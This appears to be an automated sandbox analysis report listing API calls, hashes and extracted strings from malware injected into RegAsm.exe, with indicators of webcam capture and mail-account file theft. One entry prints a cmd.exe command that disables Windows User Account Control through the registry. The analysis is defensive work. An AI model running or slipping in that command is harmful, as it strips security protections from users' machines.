                                                                                                                                        • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                                                                        • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                                        • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                                                                        Strings
                                                                                                                                        • @0O, xrefs: 004076DF
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                                                                                                        • Rmc-8AXK3L, xrefs: 00407715
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @0O$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-8AXK3L
                                                                                                                                        • API String ID: 0-3268115521
                                                                                                                                        • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                                                                        • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                                                                                        • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                                                                        • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                                                                                        APIs
                                                                                                                                        • __allrem.LIBCMT ref: 0043ACE9
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                                                                        • __allrem.LIBCMT ref: 0043AD1C
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                                                                        • __allrem.LIBCMT ref: 0043AD51
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1992179935-0
                                                                                                                                        • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                                        • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                                                                        • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                                        • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                                                                          • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prologSleep
                                                                                                                                        • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                                                                        • API String ID: 3469354165-3054508432
                                                                                                                                        • Opcode ID: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                                                                                                                                        • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                                                                                        • Opcode Fuzzy Hash: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                                                                                                                                        • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __cftoe
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4189289331-0
                                                                                                                                        • Opcode ID: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                                                                                        • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                                                                        • Opcode Fuzzy Hash: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                                                                                        • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                                                                        APIs
                                                                                                                                        • _strlen.LIBCMT ref: 10001607
                                                                                                                                        • _strcat.LIBCMT ref: 1000161D
                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                        • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1922816806-0
                                                                                                                                        • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                        • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                        • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                        • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                        APIs
                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3594823470-0
                                                                                                                                        • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                        • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                        • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                        • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                        APIs
                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 493672254-0
                                                                                                                                        • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                                                        • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                                                                        • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                                                        • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                        • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                        • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                        • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                        • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                        • _free.LIBCMT ref: 004482CC
                                                                                                                                        • _free.LIBCMT ref: 004482F4
                                                                                                                                        • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                        • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                        • _abort.LIBCMT ref: 00448313
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                        • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                        • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                                                                        • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                        • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                        • _free.LIBCMT ref: 10005B2D
                                                                                                                                        • _free.LIBCMT ref: 10005B55
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                        • _abort.LIBCMT ref: 10005B74
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                        • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                        • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                        • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                        • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                        APIs
                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 221034970-0
                                                                                                                                        • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                        • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                                                        • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                        • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                                                        APIs
                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 221034970-0
                                                                                                                                        • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                        • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                                                        • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                        • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                                                        APIs
                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 221034970-0
                                                                                                                                        • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                        • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                                                        • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                        • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                          • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                          • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                          • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                          • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                          • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                          • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                        • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                        • API String ID: 4036392271-1520055953
                                                                                                                                        • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                        • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                        • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                        • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                        • String ID: 0$MsgWindowClass
                                                                                                                                        • API String ID: 2877667751-2410386613
                                                                                                                                        • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                        • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                                                                        • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                        • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                                                                        Strings
                                                                                                                                        • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                                                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$CreateProcess
                                                                                                                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                        • API String ID: 2922976086-4183131282
                                                                                                                                        • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                                        • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                                                                        • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                                        • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                                                                        APIs
